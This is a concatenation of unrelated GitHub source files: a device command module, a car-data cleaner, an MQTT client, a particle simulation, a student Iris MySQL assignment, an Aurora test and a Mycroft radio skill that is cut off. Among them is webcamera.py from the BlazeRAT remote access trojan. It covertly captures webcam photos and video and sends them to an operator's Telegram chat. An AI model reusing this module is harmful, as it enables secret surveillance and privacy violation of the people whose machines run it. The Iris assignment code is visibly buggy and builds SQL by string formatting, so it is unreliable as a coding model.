b'\\x55\\x2D\\x05\\x00\\x00\\x00', True , False), #2Dh\n\n ('get_sensor_value' , 143, b'\\x55\\x3C\\x01\\x00\\x00\\x00', True , True), #3Ch\n ('get_all_sensors_values' , 153, b'\\x55\\x00\\x00\\x00\\x00\\x00', False, True), #00h \n # (last command moved to the bootom to exclude 0 command)\n]\n\nstandard_response: bytearray = bytearray(b'\\x55\\xff\\x02\\x00\\x00\\x00\\x01\\xff')\n# standard_response[2] = 16*15+13\n\n\n#----преобразователи параметров команды в информационное поле битового сообщения----\n\ndef reflector_motor_open_info(cmd_name: str, *info_field_params) -> bytes:\n if len(info_field_params) != 1: \n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong length of parameters list')\n return\n motor_number: int = info_field_params[0]\n if type(motor_number) is not int:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Parameter must be an int')\n return\n if motor_number not in [0, 1]:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong parameter value')\n return\n info_field: bytes = struct.pack('B', motor_number)\n print(f'info field for \"{cmd_name}\" command is', info_field)\n return info_field\n\ndef reflector_motor_close_info(cmd_name: str, *info_field_params) -> bytes:\n if len(info_field_params) != 1: \n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong length of parameters list')\n return\n motor_number: int = info_field_params[0]\n if type(motor_number) is not int:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Parameter must be an int')\n return\n if motor_number not in [0, 1]:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong parameter value')\n return\n info_field: bytes = struct.pack('B', motor_number)\n print(f'info field for \"{cmd_name}\" command is', info_field)\n return info_field\n\ndef bench_tension_setup_info(cmd_name: str, *info_field_params) -> bytes:\n if len(info_field_params) != 1: \n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong length of parameters list')\n return\n tension_value: int = info_field_params[0]\n if type(tension_value) is not int:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Parameter must be an int')\n return\n if (tension_value < -(2**31)) or (tension_value > 2**31 - 1 ):\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong parameter value')\n return\n info_field: bytes = struct.pack('l', tension_value)\n print(f'info field for \"{cmd_name}\" command is', info_field)\n return info_field\n\ndef bench_motor_open_info(cmd_name: str, *info_field_params) -> bytes:\n if len(info_field_params) != 1: \n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong length of parameters list')\n return\n motor_number: int = info_field_params[0]\n if type(motor_number) is not int:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Parameter must be an int')\n return\n if motor_number not in list(range(2, 26)): #26 is excluded\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong parameter value')\n return\n info_field: bytes = struct.pack('B', motor_number)\n print(f'info field for \"{cmd_name}\" command is', info_field)\n return info_field\n\ndef bench_motor_close_info(cmd_name: str, *info_field_params) -> bytes:\n if len(info_field_params) != 1: \n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong length of parameters list')\n return\n motor_number: int = info_field_params[0]\n if type(motor_number) is not int:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Parameter must be an int')\n return\n if motor_number not in list(range(2, 26)):\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong parameter value')\n return\n info_field: bytes = struct.pack('B', motor_number)\n print(f'info field for \"{cmd_name}\" command is', info_field)\n return info_field\n\ndef bench_motor_tension_setup_info(cmd_name: str, *info_field_params) -> bytes:\n if len(info_field_params) != 2: \n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong length of parameters list')\n return\n motor_number: int = info_field_params[0]\n if type(motor_number) is not int:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Parameter must be an int')\n return\n if motor_number not in list(range(2, 26)):\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong parameter value')\n return\n tension_value: int = info_field_params[1]\n if type(tension_value) is not int:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Parameter must be an int')\n return\n if (tension_value < -(2**31)) or (tension_value > 2**31 - 1 ):\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong parameter value')\n return\n info_field: bytes = struct.pack('Bl', motor_number, tension_value)\n print(f'info field for \"{cmd_name}\" command is', info_field)\n return info_field\n\ndef get_sensor_value_info(cmd_name: str, *info_field_params) -> bytes:\n if len(info_field_params) != 1: \n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong length of parameters list')\n return\n sensor_number: int = info_field_params[0]\n if type(sensor_number) is not int:\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Parameter must be an int')\n return\n if sensor_number not in list(range(0, 25)):\n print(f'Wrong parameters for \"{cmd_name}\" command. '\n +'Wrong parameter value')\n return\n info_field: bytes = struct.pack('B', sensor_number)\n print(f'info field for \"{cmd_name}\" command is', info_field)\n return info_field\n\n\n#-------------проверка ответа сервера (response check funcs)-------------\n\ndef check_get_sensor_value(actual_response: bytes) -> bool:\n actual_response_btray = bytearray(actual_response)\n ideal_response_prefix = bytearray(b'\\x55\\x3C\\x05\\x00\\x00\\x00')\n ideal_response_length: int = 11\n is_command_succ = \\\n (len(actual_response_btray) == ideal_response_length) and \\\n (ideal_response_prefix in actual_response_btray)\n return is_command_succ\n\ndef check_get_all_sensors_values(actual_response: bytes) -> bool:\n actual_response_btray = bytearray(actual_response)\n ideal_response_prefix = bytearray(b'\\x55\\x00\\x68\\x00\\x00\\x00')\n ideal_response_length: int = 110\n is_command_succ = \\\n (len(actual_response_btray) == ideal_response_length) and \\\n (ideal_response_prefix in actual_response_btray)\n return is_command_succ\n\n#-------------response data decode funcs-----------------------\n","repo_name":"qu-od/aperture","sub_path":"_python_client/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":16127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11547877520","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# Import modules\nfrom io import BytesIO\nfrom core.logger import Log\nfrom os import path, remove\nfrom threading import Thread\nfrom tempfile import gettempdir\nfrom core.messages import services as Messages\nfrom cv2 import VideoCapture, VideoWriter, VideoWriter_fourcc,\\\n flip, imencode # pip3 install opencv-python\n\n\"\"\"\nAuthor : LimerBoy\ngithub.com/LimerBoy/BlazeRAT\n\nNotes :\n The file is needed\n to create photos and videos from the webcam\n\"\"\"\n\n# Global variables\nglobal file, r, t, camera, output\nr, t, camera, output = False, None, None, None\nfile = path.join(gettempdir(), \"webcamera.avi\")\n\n\"\"\" Check camera by index \"\"\"\ndef _CheckCamera(device: int = 0) -> bool:\n camera = VideoCapture(device)\n status = camera.isOpened()\n camera.release()\n return status\n\n\"\"\" Capture image \"\"\"\ndef _CaptureImage(device: int = 0) -> bytes:\n # Open webcamera\n camera = VideoCapture(device)\n # If failed to open camera\n if not camera.isOpened():\n return False\n # Capture frame\n for _ in range(15):\n _, image = camera.read()\n # Release camera\n camera.release()\n del(camera)\n # Write to memory\n _, buffer = imencode(\".jpg\", image)\n obj = BytesIO(buffer)\n return obj.getvalue()\n\n\"\"\" Capture video from camera \"\"\"\ndef _CaptureVideo(device: int = 0) -> None:\n # Initialize\n global r, camera, output, file\n r = True\n camera = VideoCapture(device)\n fourcc = VideoWriter_fourcc(*\"XVID\")\n output = VideoWriter(file, fourcc, 20.0, (640,480))\n # Capture webcam\n while (r and camera.isOpened()):\n res, frame = camera.read()\n if res:\n frame = flip(frame, 0)\n output.write(frame)\n else:\n break\n\n\"\"\" Asynchronously capture video from camera \"\"\"\ndef _StartAsync(device: int = 0) -> None:\n global r, t\n if r: return False\n try:\n t = Thread(target=_CaptureVideo, args=(device,))\n t.start()\n except Exception as error:\n print(error)\n r = False\n else:\n return True\n\n\"\"\" Stop webcam capture \"\"\"\ndef _Stop() -> bytes:\n global r, t, camera, output, file\n if not r: return False\n r = False\n t.join()\n # Release everything if job is finished\n camera.release()\n output.release()\n # Read file and delete\n content = open(file, \"rb\")\n remove(file)\n return content\n\n\"\"\" Handle telegram command \"\"\"\ndef Handle(callback: dict, bot) -> None:\n text = callback.data\n chatid = callback.from_user.id\n device = 0\n # Detect camera device\n if \"_\" in text:\n device = int(text.split('_')[-1])\n # Take screenshot from webcamera\n if \"Screenshot\" in text:\n bot.send_chat_action(chatid, \"upload_photo\")\n # Check camera\n if not _CheckCamera(device):\n return bot.send_message(chatid, Messages.webcam_failed_open % device)\n # Log\n Log(f\"Webcam >> Create screenshot from device {device}\", chatid)\n # Take picture\n screenshot = _CaptureImage(device)\n if screenshot != False:\n bot.send_photo(chatid,\n photo=screenshot,\n caption=Messages.webcam_screenshot_captured,\n )\n # Send error message\n else:\n bot.send_message(chatid, Messages.webcam_failed_open % device)\n # Start webcam recording\n if \"Enable\" in text:\n # Check camera\n if not _CheckCamera(device):\n return bot.send_message(chatid, Messages.webcam_failed_open % device)\n # Log\n Log(f\"Webcam >> Start video recording from device {device}\", chatid)\n # Start image recording\n video = _StartAsync(device)\n if video != False:\n bot.send_message(chatid, Messages.webcam_recording_started)\n bot.send_chat_action(chatid, \"record_video\")\n # Send error message if recording already started\n else:\n bot.send_message(chatid, Messages.webcam_recording_not_stopped)\n # Stop microphone recording\n elif \"Disable\" in text:\n # Send recorded voice message\n video = _Stop()\n if video != False:\n Log(f\"Webcam >> Stop video recording from device {device}\", chatid)\n bot.send_chat_action(chatid, \"upload_video\")\n bot.send_video_note(\n chatid, video,\n reply_to_message_id=callback.message.message_id,\n )\n bot.send_message(chatid, Messages.webcam_recording_stopped)\n # Send error message if recording not started\n else:\n bot.send_message(chatid, Messages.webcam_recording_not_started)\n","repo_name":"LimerBoy/BlazeRAT","sub_path":"BlazeRAT/services/webcamera.py","file_name":"webcamera.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"3"} +{"seq_id":"71188745683","text":"import json\nimport re as RegEx\n\nclass Cars:\n def __init__(self):\n self.cars = []\n\n def append(self, car):\n self.cars.append(car)\n\nclass Car:\n def __init__(self, j):\n self.__dict__ = j\n\n def CLEANME(self):\n pattern = RegEx.compile(\"\\['(.*)'\\]\")\n for eintrag in self.__dict__:\n result = pattern.match(self.__dict__[eintrag])\n if result:\n self.__dict__[eintrag] = result.group(1)\n\n result = RegEx.match(\"(.*)\\s?/\\s?(.*)\", self.__dict__[\"hsntsn\"])\n self.hsn = result.group(1)\n self.tsn = result.group(2)\n\n del self.__dict__[\"hsntsn\"]\n del self.__dict__[\"kh10t\"]\n del self.__dict__[\"tk10t\"]\n del self.__dict__[\"vk10t\"]\n\ndef obj_dict(obj):\n return obj.__dict__\n\nwith open(\"ca.rs\", \"r\") as inp:\n with open(\"out.json\", \"w\") as out:\n cars = Cars()\n for x in json.loads(inp.read()):\n car = Car(x)\n car.CLEANME()\n cars.append(car)\n json.dump(cars, out, default=obj_dict)\n","repo_name":"ZielMartin/MobAppProj","sub_path":"pythonscript/readFile.py","file_name":"readFile.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6996478131","text":"import os, sys\nsys.path.append(os.getcwd())\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\nimport paho.mqtt.client as mqtt\nfrom lib.client import MQTTRPCClient\nimport logging\nlogging.basicConfig( filename = 'logs/client_flow.log', level=logging.INFO, filemode = 'w' )\n \nif __name__ == '__main__':\n logger = logging.getLogger(__name__)\n mqttClient = mqtt.Client()\n mqttClient.connect('localhost',1883)\n client = MQTTRPCClient( mqttClient, False )\n for i in range(10):\n #calls calc.add(1,2) and return result\n result = client.callRemote('CalculatorService','add',[1,2]) \n print(\"result-> \" + str(result))\n\n ''' \n result = client.callRemote('CalculatorService','sub',[1,2]) \n print'result-> ', result\n result = client.callRemote('CalculatorService','mul',[1,2]) \n print'result-> ', result\n ''' \n\n","repo_name":"mastash3ff/MQTT-RPC","sub_path":"mqtt-rpc-python/examples/client_example.py","file_name":"client_example.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"1758886733","text":"from math import sin, cos, radians\n\nimport numpy as np\nimport pygame\n\n\ndef toCartesian(r, θ):\n # Return cartesian coordinates from polar as tuple.\n # Keyword Arguments:\n # r -- magnitude\n # θ -- angle (in degrees)\n\n return (r*cos(radians(θ)), -r*sin(radians(θ)))\n\n\nclass Particle(pygame.sprite.Sprite):\n def __init__(self, mass, radius, colour, position, velocity):\n pygame.sprite.Sprite.__init__(self)\n\n self.mass = mass\n self.radius = radius\n self.position = position.astype(float)\n self.velocity = velocity.astype(float) # in pixels per second\n\n # Setting the image of the particle\n self.colour = colour\n self.image = pygame.Surface((int(2*radius),)*2).convert_alpha()\n self.image.fill((0, 0, 0, 0)) # Transparent background\n pygame.draw.circle(self.image, colour, (radius, radius), radius)\n\n # Coordinates to pygame rect\n self.rect = self.image.get_rect()\n self.rect.center = position.copy()\n self.prevpos = position.copy()\n\n self.currentlyColliding = [] # For wall collisions\n self.updateProperties()\n\n def testParticleCollision(self, particle, n=1):\n # Checks whether self and particle are colliding\n # n is the number of divisions the collision checks from prevpos\n\n collided = False\n\n prevcurrS = self.position - self.prevpos\n prevcurrP = particle.position - particle.prevpos\n\n for i in range(1, n+1):\n betweenS = self.prevpos + prevcurrS * i/n\n betweenP = particle.prevpos + prevcurrP * i/n\n\n # The actual collision check!\n if pygame.sprite.collide_rect(self, particle):\n if ((betweenS - betweenP)**2).sum() <= (self.radius + particle.radius)**2:\n collided = True\n break\n\n if not(particle in self.currentlyColliding) or not(self in particle.currentlyColliding):\n if collided:\n self.position = betweenS\n particle.position = betweenP\n\n self.currentlyColliding.append(particle)\n particle.currentlyColliding.append(self)\n\n self.particleCollision(particle)\n\n if not collided:\n try:\n self.currentlyColliding.remove(particle)\n particle.currentlyColliding.remove(self)\n except ValueError:\n pass\n\n return collided\n\n def particleCollision(self, particle):\n self.updateProperties()\n particle.updateProperties()\n\n m1 = self.mass\n m2 = particle.mass\n\n x1 = self.position\n x2 = particle.position\n\n v1 = self.velocity\n v2 = particle.velocity\n\n self.velocity = v1 - (x1-x2) * 2*m2/(m1+m2) * \\\n np.dot(v2-v1, x2-x1)/((x1-x2)**2).sum()\n particle.velocity = v2 - (x2-x1) * 2*m1/(m2+m1) * \\\n np.dot(v1-v2, x1-x2)/((x2-x1)**2).sum()\n\n self.updateProperties()\n particle.updateProperties()\n\n def testWallCollision(self, res):\n # This method is like this to prevent particles getting stuck off-screen...\n if self.rect.left <= 0 and not 'Left Wall' in self.currentlyColliding:\n self.currentlyColliding.append('Left Wall')\n self.velocity[0] *= -1\n return True\n if self.rect.left > 0 and 'Left Wall' in self.currentlyColliding:\n if 'Left Wall' in self.currentlyColliding:\n self.currentlyColliding.remove('Left Wall')\n\n if self.rect.right >= res[0] and not 'Right Wall' in self.currentlyColliding:\n self.currentlyColliding.append('Right Wall')\n self.velocity[0] *= -1\n return True\n if self.rect.right < res[0] and 'Right Wall' in self.currentlyColliding:\n if 'Right Wall' in self.currentlyColliding:\n self.currentlyColliding.remove('Right Wall')\n\n if self.rect.top <= 0 and not 'Top Wall' in self.currentlyColliding:\n self.currentlyColliding.append('Top Wall')\n self.velocity[1] *= -1\n return True\n if self.rect.top > 0 and 'Top Wall' in self.currentlyColliding:\n if 'Top Wall' in self.currentlyColliding:\n self.currentlyColliding.remove('Top Wall')\n\n if self.rect.bottom >= res[1] and not 'Bottom Wall' in self.currentlyColliding:\n self.currentlyColliding.append('Bottom Wall')\n self.velocity[1] *= -1\n return True\n if self.rect.bottom < res[1] and 'Bottom Wall' in self.currentlyColliding:\n if 'Bottom Wall' in self.currentlyColliding:\n self.currentlyColliding.remove('Bottom Wall')\n\n return False\n\n def updatePosition(self, milli):\n self.prevpos = self.position.copy()\n self.position += self.velocity * milli/1000\n self.rect.center = tuple(round(x) for x in self.position)\n\n def updateProperties(self):\n self.speed = np.sqrt((self.velocity**2).sum())\n\n # For inspection only\n self.momentum = self.mass * self.velocity\n self.KE = 0.5 * self.mass * self.speed**2\n","repo_name":"ScxttM/cursoSimulacion","sub_path":"practica4/particle.py","file_name":"particle.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29008218134","text":"\nimport mysql.connector as mc\nimport pandas as pd\nimport unittest\nfrom sklearn import datasets as ds\n\n\n'''\n* Objective\n\nThe Iris class below manages a database version of the Iris dataset available in the sklearn package.\nBuild out the Iris class to be able to make it intelligent enough to handle\nmultiple Iris databases. Each database holds one IRIS_DATA table.\n\nHints below will help you through building this code out.\n\nWhat each function should do:\n\nIris constructor - Will allow a user to create or use an existing MySQL Iris database. The new\nflag specifies if the database should be created including the IRIS_DATA table. If the flag is false\nit will simply connect to an existing Iris database.\n\nload() - Loads the Iris data from sklearn into the MySQL database table under the dbname specified. All\n150 observations are loaded in. Your table should look like this: https://pasteboard.co/HPCJOiI.png\n\ndisplay_gt() - Takes an integer argument n and displays all rows with id greater than n\n\ndel_observations() - Takes a list of ids and deletes them from the table\n\nupdate_observation() - Takes 3 arguments - The id, new target species and new target_species_id and updates the \nrow with the new information\n\n\n* Suggested reading / references:\n\nhttps://dev.mysql.com/doc/connector-python/en/\nhttps://dev.mysql.com/doc/connector-python/en/connector-python-example-ddl.html\nhttps://dev.mysql.com/doc/refman/8.0/en/truncate-table.html\nhttps://dev.mysql.com/doc/connector-python/en/connector-python-example-cursor-transaction.html\nhttps://dev.mysql.com/doc/refman/8.0/en/use.html\n\n\nhttps://www.w3schools.com/sql/sql_select.asp\nhttps://www.w3schools.com/sql/sql_insert.asp\nhttps://www.w3schools.com/sql/sql_delete.asp\nhttps://www.w3schools.com/sql/sql_update.asp\nhttps://www.w3schools.com/sql/sql_drop_db.asp\n\n\n* DDL for iris_data table and sample SQL statements:\n\nDROP DATABASE data602;\nCREATE DATABASE data602;\nUSE data602;\nDROP TABLE IF EXISTS iris_data;\n\nCREATE TABLE iris_data (\n\tid INT NOT NULL,\n feature_sepal_length FLOAT NOT NULL,\n feature_sepal_width FLOAT NOT NULL,\n feature_petal_length FLOAT NOT NULL,\n feature_petal_width FLOAT NOT NULL,\n target_species VARCHAR(20) NOT NULL,\n target_species_id INT NOT NULL\n\n);\n\nHint: When building this out, temporarily remove the NOT NULLs in the IRIS_DATA so that you can test without \nhaving to add data in all columns\n\nThe database host address is assumed to be 127.0.0.1 (your local computer)\n\nA successful run of the unit tests will look like this:\n\n$ python .\\08_assignment_solution.py\nDatabase and IRIS table created in DB data602\nRow count is 0\nIris dataset loaded\nRow count is 150\nIris dataset loaded\nRow count is 300\nDatabase and IRIS table created in DB data602x\nRow count is 0\nIris dataset loaded\nRow count is 150\nIris table truncated\nIris dataset loaded\nRow count is 150\n(149, 5.9, 3.0, 5.1, 1.8, 'virginica', 2)\n(149, 5.9, 3.0, 5.1, 1.8, 'stuff', 5)\n(149, 5.9, 3.0, 5.1, 1.8, 'virginica', 2)\nRow count is 144\nRow count is 150\n.\n----------------------------------------------------------------------\nRan 1 test in 0.658s\n\n'''\ndef main():\n # Usage example. \n \n #Change get_credentials() with your password.\n creds = get_credentials()\n iris = Iris(creds) # Create a MySQL database called data602\n iris.load() # Load Iris data from sklearn and pump it into IRIS_DATA table\n iris.display_gt(140) # Display to the screen all rows with ID greater than 140\n \n iris2 = Iris(creds,dbname='anotherone') # Creates a 2nd MySQL database called anotherone, you now have 2 databases (one server still, tho)\n iris2.load() # Load Iris data\n iris2.del_observations([0,1,2]) # Delete observations that have id equal to 0, 1 or 2\n\n iris.update_observation(0,'stuff',5) # Change observation id 0 to a different label\n\n iris.close() # Close connection\n iris2.close() # Close connection\n\n# Change password\ndef get_credentials():\n return {'user':'root','password':'passtest'}\n\nclass Iris:\n def __init__(self,creds,dbname='data602',new=True):\n self.__conn = self.__get_connection(creds)\n # connect and store the connection object \n self.__dbname = dbname # store the database name\n\n if new:\n # if new, create database / table\n self.__create()\n else:\n # else make sure to USE the right database\n cursor = self.__conn.cursor()\n cursor.execute(\"USE data602\")\n cursor.close()\n\n # Drop the database and create a new one with a new table\n def __create(self):\n # ------ Place code below here \\/ \\/ \\/ ------\n cursor = self.__conn.cursor()\n \n try:\n cursor.execute(\"DROP DATABASE IF EXISTS data602\")\n cursor.execute(\"DROP TABLE IF EXISTS iris_data\")\n except:\n pass\n cursor.execute('CREATE DATABASE {}'.format(self.__dbname))\n \n cursor.execute('USE {}'.format(self.__dbname))\n \n cursor.execute('''\n CREATE TABLE iris(\n id INT NOT NULL,\n feature_sepal_length FLOAT NOT NULL,\n feature_sepal_width FLOAT NOT NULL,\n feature_petal_length FLOAT NOT NULL,\n feature_petal_width FLOAT NOT NULL,\n target_special VARCHAR(20) NOT NULL,\n target_species_id INT NOT NULL\n )\n ''')\n cursor.close()\n\n # ------ Place code above here /\\ /\\ /\\ ------\n print(\"Database and IRIS table created in DB {}\".format(self.__dbname))\n # Close connection\n \n def close(self):\n # ------ Place code below here \\/ \\/ \\/ ------\n self.__conn.close()\n\n # ------ Place code above here /\\ /\\ /\\ ------\n print('Disconnected')\n\n # Loop the Iris data and INSERT into the IRIS_DATA table\n def load(self,truncate=False):\n if truncate:\n # ------ Place code below here \\/ \\/ \\/ ------\n self.__truncate_iris()\n\n # ------ Place code above here /\\ /\\ /\\ ------\n print('Iris table truncated')\n # ------ Place code below here \\/ \\/ \\/ ------\n cursor = self.__conn.cursor()\n iris = ds.load_iris()\n df = pd.DataFrame(iris.data, columns=iris.feature_names)\n df[\"Species\"] = pd.Categorical.from_codes(iris.target, iris.target_names)\n df[\"SpeciesId\"] = iris.target\n \n for index, row in iris.iterrows():\n cursor.execute(\"INSERT INTO iris (id, feature_sepal_length, feature_sepal_wdith, feature_petal_length, feature_petal_width, target_species, target_species_id) VALUES (%s, %s, %s, %s, %s, %s, %s)\", (index, row[\"sepal length (cm)\"], row[\"sepal width (cm)\"], row['petal length (cm)'], row['petal width (cm)'], row['Species'], row['SpeciesID']) )\n \n \n \n self.__conn.commit()\n # ------ Place code above here /\\ /\\ /\\ ------\n print('Iris dataset loaded')\n\n # Display all rows that have ID greater than integer n\n def display_gt(self,n): \n # ------ Place code below here \\/ \\/ \\/ ------\n cursor = self.__conn.cursor()\n cursor.execute('SELECT * FROM iris WHERE id > {a}'.format(a=n))\n records = cursor.fetchall()\n for i in records:\n print(i)\n cursor.close()\n # ------ Place code above here /\\ /\\ /\\ ------\n\n # Update observation with a specific id to a new target species and species id\n def update_observation(self,id,new_target_species,new_target_species_id):\n # ------ Place code below here \\/ \\/ \\/ ------\n cursor = self.__conn.cursor()\n cursor.execute('USE {};'.format(self.__dbname))\n \n \n cursor.execute(\"SELECT * FROM iris\")\n sql = \"UPDATE iris SET target_species=%s, target_species_id=%s WHERE id = %s\"\n values = (new_target_species,new_target_species_id, id)\n cursor.execute(sql, values)\n self.__conn.commit()\n\n # ------ Place code above here /\\ /\\ /\\ ------\n\n # Delete all rows that are in the list row_ids \n def del_observations(self,row_ids):\n # ------ Place code below here \\/ \\/ \\/ ------\n cursor = self.__conn.cursor(buffer=True)\n \n cursor.execute('DELETE FROM iris WHERE id IN {}'.format(tuple(row_ids)))\n self.__conn.commit()\n \n #USE of IN operator - AKA the reson for converting row_ids to tuple\n #Ref: https://www.w3schools.com/sql/sql_in.asp\n # ------ Place code above here /\\ /\\ /\\ ------\n\n # Truncate the IRIS_DATA table\n def __truncate_iris(self):\n # ------ Place code below here \\/ \\/ \\/ ------\n cursor = self.__conn.cursor()\n \n cursor.execute('TRUNCATE TABLE iris') # delete all rows of iris data table\n self.__conn.commit()\n # ------ Place code above here /\\ /\\ /\\ ------\n\n # Establish a connection\n def __get_connection(self,creds):\n return mc.connect(user=creds['user'], password=creds['password'],\n host='127.0.0.1',\n auth_plugin='mysql_native_password') \n\n # Returns the current row count of the IRIS_DATA table\n def get_row_count(self):\n # ------ Place code below here \\/ \\/ \\/ ------\n \n #Establish connection using credentials \n cursor = self.__conn.cursor(buffered = True) # handles 'undread result error'\n cursor.execute('SELECT COUNT (*) FROM iris')\n count = cursor.fetchone()[0] # extract count # from '()' around it, if not error\n print('Row count is {}'.format(count))\n \n #cursor.execute(SELECT * FROM iris)\n #count = cursor.rowcount\n #if count == 'None':\n #count = 0\n # ------ Place code above here /\\ /\\ /\\ ------\n return count\n\nclass TestAssignment8(unittest.TestCase):\n def test(self):\n creds = get_credentials()\n db1 = Iris(creds)\n self.assertEqual(db1.get_row_count(),0)\n db1.load()\n self.assertEqual(db1.get_row_count(),150)\n db1.load()\n self.assertEqual(db1.get_row_count(),300)\n db2 = Iris(creds,dbname='data602x')\n self.assertEqual(db2.get_row_count(),0)\n db2.load()\n self.assertEqual(db2.get_row_count(),150)\n db1.load(truncate=True)\n self.assertEqual(db1.get_row_count(),150)\n db1.display_gt(148)\n db1.update_observation(149,'stuff',5)\n db1.display_gt(148)\n db2.display_gt(148)\n db1.del_observations([0,1,2,3,4,5])\n self.assertEqual(db1.get_row_count(),144)\n self.assertEqual(db2.get_row_count(),150)\n\n\nif __name__ == '__main__':\n #main()\n unittest.main()\n","repo_name":"geeman1209/MSDATA2020","sub_path":"Data 602/pythoncourse-master (3)/pythoncourse-master/08_assignment.py","file_name":"08_assignment.py","file_ext":"py","file_size_in_byte":10857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22668512212","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport os\nimport unittest\n\nfrom mock import Mock, create_autospec, patch\n\nfrom apache.aurora.executor.bin.thermos_executor_main import dump_runner_pex, initialize, proxy_main\nfrom apache.aurora.executor.common.path_detector import MesosPathDetector\nfrom apache.aurora.executor.thermos_task_runner import DefaultThermosTaskRunnerProvider\n\n\ndef test_thermos_executor_valid_import_dependencies():\n assert proxy_main is not None\n\n\nclass ThermosExecutorMainTest(unittest.TestCase):\n def test_checkpoint_path(self):\n mock_runner_provider = create_autospec(spec=DefaultThermosTaskRunnerProvider)\n mock_dump_runner_pex = create_autospec(spec=dump_runner_pex)\n mock_dump_runner_pex.return_value = Mock()\n mock_options = Mock()\n mock_options.execute_as_user = False\n mock_options.nosetuid = False\n mock_options.announcer_ensemble = None\n mock_options.stop_timeout_in_secs = 1\n with patch(\n 'apache.aurora.executor.bin.thermos_executor_main.dump_runner_pex',\n return_value=mock_dump_runner_pex):\n with patch(\n 'apache.aurora.executor.bin.thermos_executor_main.DefaultThermosTaskRunnerProvider',\n return_value=mock_runner_provider) as mock_provider:\n\n expected_path = os.path.join(os.path.abspath('.'), MesosPathDetector.DEFAULT_SANDBOX_PATH)\n thermos_executor = initialize(mock_options)\n\n assert thermos_executor is not None\n assert len(mock_provider.mock_calls) == 1\n args = mock_provider.mock_calls[0][1]\n assert len(args) == 2 and expected_path == args[1]\n","repo_name":"apache/aurora","sub_path":"src/test/python/apache/aurora/executor/bin/test_thermos_executor_entry_point.py","file_name":"test_thermos_executor_entry_point.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","stars":630,"dataset":"github-code","pt":"3"} +{"seq_id":"6183054337","text":"from typing import Optional, Tuple\nimport threading\nimport requests\n\nfrom mycroft.skills import AdaptIntent, GuiClear, intent_handler\nfrom mycroft.skills.common_play_skill import CommonPlaySkill, CPSMatchLevel\nfrom mycroft_bus_client import Message\n\nfrom .RadioStations import GenreTagNotFound, RadioStations\n\n# Minimum confidence levels\nCONF_EXACT_MATCH = 0.9\nCONF_LIKELY_MATCH = 0.7\nCONF_GENERIC_MATCH = 0.6\n\n\"\"\"\nProvides base functionality for Mycroft's radio skill.\n\"\"\"\n\n\nclass RadioFreeMycroftSkill(CommonPlaySkill):\n \"\"\"simple streaming radio skill\"\"\"\n\n def __init__(self, skill_id: str):\n super().__init__(skill_id=skill_id, name=\"Mycroft Radio Skill\")\n self._rs: Optional[RadioStations] = None\n self.current_station = None\n self.station_name = \"Mycroft Radio\"\n self.img_pth = \"\"\n self.stream_uri = \"\"\n self.fg_color = \"white\"\n self.bg_color = \"black\"\n self.genre_images = {\n \"alternative\": \"genre_alternative.svg\",\n \"classical\": \"genre_classical.svg\",\n \"country\": \"genre_country.svg\",\n \"generic\": \"genre_generic_radio.svg\",\n \"hip-hop\": \"genre_hip_hop.svg\",\n \"jazz\": \"genre_jazz.svg\",\n \"metal\": \"genre_metal.svg\",\n \"pop\": \"genre_pop.svg\",\n \"rnb\": \"genre_rnb.svg\",\n \"rock\": \"genre_rock.svg\",\n }\n self._is_playing = False\n self._stream_session_id: Optional[str] = None\n self.settings_change_callback = None\n # The following is for tracking how long a station has been played.\n self.current_station_uuid: Optional[str] = None\n\n def initialize(self):\n \"\"\"Wait for internet connection before accessing radio stations\"\"\"\n self.add_event(\"mycroft.ready\", self.handle_ready)\n self.register_gui_handlers()\n\n def get_language_setting(self):\n language = self.settings.get(\"language\", \"not_set\")\n if language == \"not_set\":\n language = \"english\"\n return language\n\n @property\n def rs(self) -> RadioStations:\n \"\"\"Dynamically load radio stations\"\"\"\n 